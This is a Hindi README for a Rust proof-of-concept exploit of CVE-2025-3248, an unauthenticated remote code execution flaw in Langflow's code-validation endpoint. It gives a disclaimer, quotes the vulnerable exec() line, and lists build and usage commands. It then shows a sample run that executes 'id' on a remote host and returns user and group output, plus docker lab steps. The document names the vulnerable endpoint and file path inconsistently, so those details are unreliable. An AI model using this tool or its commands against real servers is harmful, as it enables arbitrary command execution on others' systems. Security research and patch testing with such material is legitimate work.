
CVE-2025-3248 के लिए रस्ट-आधारित प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Langflow में /api/v1/validate/code के माध्यम से महत्वपूर्ण अप्रमाणित RCE, मनमाना कमांड निष्पादन की अनुमति देता है।
⚠️ अस्वीकरण
यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। बिना स्पष्ट अनुमति के सिस्टम पर अनधिकृत उपयोग कानून का उल्लंघन हो सकता है।
लेखक इस उपकरण के किसी भी दुरुपयोग या दुर्भावनापूर्ण गतिविधि के लिए जिम्मेदार नहीं है।
CVE-2025-3248 - गंभीर
CVSS स्कोर: 9.8 | EPSS स्कोर: 92.57% | प्रकाशित: May 22, 2025
एंडपॉइंट /api/v1/validate/code बिना सैनिटाइज किए Python कोड स्वीकार करता है और उसे सीधे exec() के साथ निष्पादित करता है, जिसके लिए किसी प्रमाणीकरण की आवश्यकता नहीं है।
# langflow/api/builder/execute.py
exec(code) # कोई इनपुट सत्यापन या सैंडबॉक्सिंग नहीं!
Langflow एक /api/v1/builder/execute_code एंडपॉइंट प्रदान करता है जो उपयोगकर्ता द्वारा प्रदान किए गए Python कोड लेता है और उसे बैकएंड पर सीधे exec() को भेजता है। चूंकि कोई प्रमाणीकरण या सैंडबॉक्सिंग नहीं है, हमलावर कोड निष्पादन के लिए मनमाने पेलोड तैयार कर सकते हैं।
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC
cargo build --release
# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860,
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)
> cd lab
> sudo docker-compose up -d
> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'
> sudo docker-compose down